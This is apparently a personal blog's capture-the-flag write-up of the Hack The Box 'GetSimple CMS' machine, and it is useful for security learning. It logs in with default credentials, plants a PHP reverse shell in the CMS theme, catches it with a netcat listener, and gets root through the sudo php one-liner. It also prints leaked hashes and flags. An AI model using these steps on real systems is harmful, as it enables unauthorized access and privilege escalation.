remoteshell.zip
Posts Tags Categories
remoteshell.zip

HTB: GetSimple CMS

 included in  categories HTB CTF
     796 words   4 minutes 

Easy HTB machine where I exploit a webserver with GetSimple CMS.

I will use gobuster to find a hidden login page and use default credentials to get initial access. I get a www-data shell by using a reverse shell, and elevate privilages to root by using the sudo access for /usr/bin/php.

nmap output:

DuxSec@hi$ nmap -sV -T4 -sC 10.129.217.0 -v Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-29 06:19 EDT PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 4c:73:a0:25:f5:fe:81:7b:82:2b:36:49:a5:4d:c8:5e (RSA) | 256 e1:c0:56:d0:52:04:2f:3c:ac:9a:e7:b1:79:2b:bb:13 (ECDSA) |_ 256 52:31:47:14:0d:c3:8e:15:73:e3:c4:24:a2:3a:12:77 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Welcome to GetSimple! - gettingstarted | http-robots.txt: 1 disallowed entry |_/admin/ | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.41 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel NSE: Script Post-scanning. Initiating NSE at 06:19 Completed NSE at 06:19, 0.00s elapsed Initiating NSE at 06:19 Completed NSE at 06:19, 0.00s elapsed Initiating NSE at 06:19 Completed NSE at 06:19, 0.01s elapsed Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.82 seconds

Port 22 and 80 are open. Let’s have a look at the website, and while I am browsing I start a gobuster scan.

I tried to go to http://10.129.217.0 but this took ages to load, so I added the IP to my /etc/hosts/ file. I added the following line:

text

10.129.217.0	gettingstarted.htb

Because of this change I could now visit http://gettingstarted.htb without delay. I read in the HTB forums later on that multiple people had this issue.

Image alt

Well that took some time and the gobuster is already finished, so let’s look at that.

DuxSec@hi$ gobuster dir -u http://10.129.217.0 -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.5 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.129.217.0 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.5 [+] Timeout: 10s =============================================================== 2023/06/29 06:20:22 Starting gobuster in directory enumeration mode =============================================================== /.htpasswd (Status: 403) [Size: 277] /.hta (Status: 403) [Size: 277] /admin (Status: 301) [Size: 312] [--> http://10.129.217.0/admin/] /backups (Status: 301) [Size: 314] [--> http://10.129.217.0/backups/] /.htaccess (Status: 403) [Size: 277] /data (Status: 301) [Size: 311] [--> http://10.129.217.0/data/] /index.php (Status: 200) [Size: 5485] /plugins (Status: 301) [Size: 314] [--> http://10.129.217.0/plugins/] /robots.txt (Status: 200) [Size: 32] /server-status (Status: 403) [Size: 277] /sitemap.xml (Status: 200) [Size: 431] /theme (Status: 301) [Size: 312] [--> http://10.129.217.0/theme/] Progress: 4444 / 4615 (96.29%) =============================================================== 2023/06/29 06:20:35 Finished ===============================================================

Many hits! /admin looks very interesting, it gives shows us the following login page:

Image alt

I try the credentials admin:admin and I am in the admin panel!
Image alt

I still checked the other gobuster links to see if there is anything interesting, and found the following that there are open directories, this might be helpful later on. Some examples:

http://gettingstarted.htb/data/other/authorization.xml

xml

<item>
	<apikey>4f399dc72ff8e619e327800f851e9986</apikey>
</item>

http://gettingstarted.htb/data/users/admin.xml

xml

<item>
	<USR>admin</USR>
	<NAME/>
	<PWD>d033e22ae348aeb5660fc2140aec35850c4da997</PWD>
	<EMAIL>admin@gettingstarted.com</EMAIL>
	<HTMLEDITOR>1</HTMLEDITOR>
	<TIMEZONE/>
	<LANG>en_US</LANG>
</item>

Image alt

The next step is to get a reverse shell, I chose to use https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php due to its simplicity. I replace the original theme code with the reverse shell.
Image alt

Now I can open a nc listener. Then I can go to http://gettingstarted.htb, normally it would load the theme file, but since that is my reverse shell now, it executes that instead. It connects back to me and I succesfully get a shell as www-data.

DuxSec@hi$ nc -lnvp 4444 listening on [any] 4444 ... connect to [10.10.15.155] from (UNKNOWN) [10.129.162.83] 52066 Linux gettingstarted 5.4.0-65-generic #73-Ubuntu SMP Mon Jan 18 17:25:17 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux 14:28:43 up 30 min, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $

To get a fully interactive shell I use Python3;

$ which python3 /usr/bin/python3 $ python3 -c 'import pty;pty.spawn("/bin/bash")' www-data@gettingstarted:/$ ^Z zsh: suspended nc -lvnp 4444 DuxSec@hi$ stty raw -echo; fg [1] + continued nc -lvnp 4444 www-data@gettingstarted:/$

The first flag can be read since www-data has read access to mrb3n’s home directory.

www-data@gettingstarted:/home/mrb3n$ cat user.txt 7002d65b149b0a4d19132a66feed21d8

To get the root flag I look for sudo rights, and it shows that www-data can use /usr/bin/php as root without using a password.

www-data@gettingstarted:/$ sudo -l Matching Defaults entries for www-data on gettingstarted: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on gettingstarted: (ALL : ALL) NOPASSWD: /usr/bin/php

Knowing that php can be ran as sudo, I can spawn a shell as sudo via php in the
following way:

www-data@gettingstarted:/$ sudo /usr/bin/php -r 'system("/bin/bash");' root@gettingstarted:/# whoami root root@gettingstarted:/# cd /root root@gettingstarted:~# cat root.txt root@gettingstarted:~# f1fba6e9f71efb2630e6e34da6387842

If I wouldn’t know php, I could use https://gtfobins.github.io/gtfobins/php/ to find a privilege escalation oneliner.

Updated on 03 Nov 2024
Read markdown
 HTBNmapPython3GetSimplePHP
 | Home